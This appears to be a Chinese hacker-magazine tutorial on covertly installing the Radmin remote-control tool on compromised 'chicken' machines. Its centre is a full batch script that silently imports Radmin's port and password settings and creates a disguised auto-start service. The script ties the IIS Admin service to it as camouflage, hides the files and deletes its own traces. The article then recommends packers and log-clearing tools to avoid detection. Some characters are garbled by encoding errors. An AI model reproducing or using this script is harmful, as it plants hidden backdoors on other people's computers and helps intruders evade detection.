適合讀者：黑器愛好者、入侵愛好者

前置知識(shí)：基本DOS命令

SC+BAT攜手打造完美個(gè)人版Radmin

文/ 亦緣

R-admin是一個(gè)優(yōu)秀的遠(yuǎn)程控制軟件， 很多朋友都非常喜歡它， 所以想盡辦法讓它隱藏自己的蹤跡， 以達(dá)到更好的控制肉雞的功效， 最近經(jīng)常玩這個(gè)， 偶然之間有所心得， 不敢獨(dú)享， 特撰文與大家共享。

我們都知道R-admin的服務(wù)是通過“R_server.exe /install”這個(gè)命令來安裝的， 服務(wù)名為“R_server”， 顯示名稱為“Remote Administrator Service”， 沒有描述。 一鍵R-admin替換服務(wù)的原理就是刪掉了系統(tǒng)不常用且對(duì)系統(tǒng)運(yùn)行并無(wú)較大影響的服務(wù)后取而代之。 首先將R_server.exe更名并取代原服務(wù)（即被刪掉的系統(tǒng)服務(wù)）所運(yùn)行的exe進(jìn)程文件， 再將所需的“AdmDll.dll”和“raddrv.dll”也復(fù)制進(jìn)同目錄內(nèi)。 這里要注意的是需要導(dǎo)入的注冊(cè)表有兩個(gè)， 一個(gè)是含有端口、密碼等注冊(cè)表信息的文件， 即注冊(cè)表項(xiàng) HKEY_LOCAL_MACHINE\SYSTEM\R-admin， 另一個(gè)就是服務(wù)的注冊(cè)表文件了， 所以必須得先在自己的電腦上安裝一次R_server， 再導(dǎo)出注冊(cè)表項(xiàng) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\R_server里的內(nèi)容， 并修改里面的服務(wù)名稱， 描述等等信息。 但是不知道這樣做的人有沒有想過， 導(dǎo)入的這個(gè)服務(wù)只能應(yīng)用于與你的操作系統(tǒng)一樣的電腦上（還得包括系統(tǒng)盤在內(nèi)）， 因?yàn)槟慊�本上沒法修改進(jìn)程文件在注冊(cè)表里的路徑“ImagePath”， 所以個(gè)人覺得， 替換服務(wù)又麻煩又不方便， 不可取。

    換一個(gè)角度想， 有沒有辦法不安裝R_server在本雞也能實(shí)現(xiàn)遠(yuǎn)程安裝的呢？也就是說， 就象灰鴿子一樣， 我們能不能自定義服務(wù)名、描述和路徑來自啟動(dòng)“R_server.exe”， 讓它直接來取代R_server服務(wù)呢？理論上的回答與實(shí)踐后的答案都是肯定的。 接下來就得看“SC.exe”的了。 SC是一款非常強(qiáng)大的服務(wù)管理程序， 它和Net.exe在用法上有著相似的地方， 在XP和2003是自帶SC.exe的， 大家可以試一下在CMD下輸入SC回車后， 會(huì)出現(xiàn)很多有關(guān)與服務(wù)相關(guān)的內(nèi)容， 這也就是SC的強(qiáng)大功能介紹了。

    下邊就是我用SC和BAT的聯(lián)合起來編的一段代碼， 可以完全取代R_server服務(wù)， 做到真正完美的個(gè)人版R-admin：

——————CODE START——————

@echo off

@REM 隱藏執(zhí)行步驟

@sc stop R_server

@REM 停止“R_server”服務(wù)(防止此電腦上已經(jīng)有人裝過R-admin)

@sc delete R_server

@REM 刪除“R_server”服務(wù)

@regedit /s R-admin.reg

@REM 以隱藏方式導(dǎo)入配置好的R-admin端口， 密碼等注冊(cè)表信息。

@sc create NEWservice binpath= "%systemroot%\system32\XXX.exe /service" type= own type= interact start= auto

@REM 在本地計(jì)算機(jī)上， 建立一個(gè)自動(dòng)運(yùn)行的“NEWservice”服務(wù)， 運(yùn)行在“XXX.exe”的獨(dú)立進(jìn)程上， 并允許此服務(wù)與桌面交互(R-admin桌面控制的一個(gè)重要因素)。

@sc config NEWservice DisplayName= NEWservice123

@REM 配置“NEWservice”服務(wù)的顯示名稱為“NEWservice123”。

@sc description NEWservice NEWservice456

@REM 更改“NEWservice”服務(wù)的描述為“NEWservice456”。

@sc config IISADMIN depend= NEWservice

@REM 讓“IISADMIN(IIS Admin Service)”服務(wù)依存于“NEWservice”服務(wù)， :這樣做一來為保險(xiǎn)， 二來還可以以假亂真。

@attrib +h +r XXX.exe

@attrib +h +r AdmDll.dll

@attrib +h +r raddrv.dll

@REM 分別給以上三個(gè)文件加上隱藏和只讀屬性。

@sc start NEWservice

@REM 開始“NEWservice”服務(wù)。

@del R-admin.reg

@del sc.exe

@del 自解壓包.exe

@REM 這里就不需要解釋了吧？

——————CODE END——————

蝴蝶：上面的“XXX.exe”為原R-admin目錄里的“R_server.exe”文件， 可隨意更名；可以將以上“@REM 文字”之類的解釋語(yǔ)去掉， 不去掉也不會(huì)顯示在DOS執(zhí)行窗口里邊；“%SystemDrive%\”代表系統(tǒng)盤， “%SystemRoot%\System32”代表系統(tǒng)盤下Windows\winnt目錄下的System32目錄， “%SystemRoot%\”代表系統(tǒng)盤Windows或Winnt目錄。

這樣做出來的服務(wù)端如果運(yùn)行在Windows NT/XP/2003上就是比較完美的了， 如果安裝在Windows 9X上， 大家也可以試著從注冊(cè)表啟動(dòng)（建議最好做個(gè)Windows 9X專用的服務(wù)端， 免得服務(wù)端沒被發(fā)現(xiàn)， 卻在注冊(cè)表啟動(dòng)項(xiàng)里發(fā)現(xiàn)了， 偷雞不成蝕把米）。 建議大家不要把壓縮包做得太大， 500K以上的話就沒必要了， 盡量的給一些EXE和DLL文件加上壓縮殼， 可以在壓縮包里加入一些其它的小工具， 比如清除日志之類的等等， 看大家怎么樣去靈活運(yùn)用了。